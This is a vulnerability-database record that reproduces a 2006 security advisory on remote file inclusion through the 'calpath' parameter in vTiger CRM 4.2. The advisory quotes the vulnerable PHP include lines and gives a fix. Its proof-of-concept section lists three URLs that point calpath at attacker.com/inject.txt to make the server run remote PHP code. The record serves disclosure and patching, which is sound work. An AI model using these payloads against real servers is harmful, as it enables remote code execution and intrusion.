ID

VAR-E-200610-0678


CVE

cve_id:CVE-2006-5289

Trust: 1.6

sources: EXPLOIT-DB: 2508 // EDBNET: 26891

EDB ID

2508


TITLE

vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 2508

DESCRIPTION

vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions. CVE-30869CVE-2006-5289CVE-30868CVE-30867 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 2508

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:4.2

Trust: 1.0

sources: EXPLOIT-DB: 2508

EXPLOIT

____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_54$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_54$2006]vtiger CRM <=4.2 (calpath) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : October, 09th 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv54-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Vtiger CRM
version : <=4.2
URL : http://vtiger.com

vtiger CRM is 100% Open Source Customer Relationship Management solution built over
LAMP/WAMP stack and other third-party open source packages.
vtiger CRM software can be installed in Windows NT/2000/XP/2003 and different types
Unix/Linux-based distributions, such as RedHat 7.2/8.0/9.0, Debian 3.0, SuSe 9.0, Fedora Core 3.0,
Mandrake 10.0, Mac OS, and FreeBSD.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In folder modules/Calendar/admin/ I found vulnerability script update.php
--------------------------update.php---------------------------------------
....
<?

include_once $calpath .'webelements.p3';
include_once $calpath .'permission.p3';
...
----------------------------------------------------------

Input passed to the "$calpath" parameter in update.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

modules/Calendar/admin/update.php
modules/Calendar/admin/scheme.php
modules/Calendar/calendar.php

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[vtiger_crm_path]/modules/Calendar/admin/update.php?calpath=http://attacker.com/inject.txt?
http://target.com/[vtiger_crm_path]/modules/Calendar/scheme.php?calpath=http://attacker.com/inject.txt?
http://target.com/[vtiger_crm_path]/modules/Calendar/calendar.php?calpath=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Upgrade to Vtiger CRM 5.0
- Sanitize variable $calpath on affected files.
- Turn off register_globals

Timeline:
~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-10]

Trust: 1.0

sources: EXPLOIT-DB: 2508

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 2508

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 2508

TYPE

'calpath' Multiple Remote File Inclusions

Trust: 1.0

sources: EXPLOIT-DB: 2508

CREDITS

the_day

Trust: 0.6

sources: EXPLOIT-DB: 2508

EXTERNAL IDS

db:NVDid:CVE-2006-5289

Trust: 1.6

db:EXPLOIT-DBid:2508

Trust: 1.6

db:EDBNETid:26891

Trust: 0.6

sources: EXPLOIT-DB: 2508 // EDBNET: 26891

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2006-5289

Trust: 1.6

url:http://advisories.echo.or.id/adv/adv54-theday-2006.txt

Trust: 1.0

url:https://www.exploit-db.com/exploits/2508/

Trust: 0.6

sources: EXPLOIT-DB: 2508 // EDBNET: 26891

SOURCES

db:EXPLOIT-DBid:2508
db:EDBNETid:26891

LAST UPDATE DATE

2022-07-27T09:20:29.096000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:2508date:2006-10-10T00:00:00
db:EDBNETid:26891date:2006-10-10T00:00:00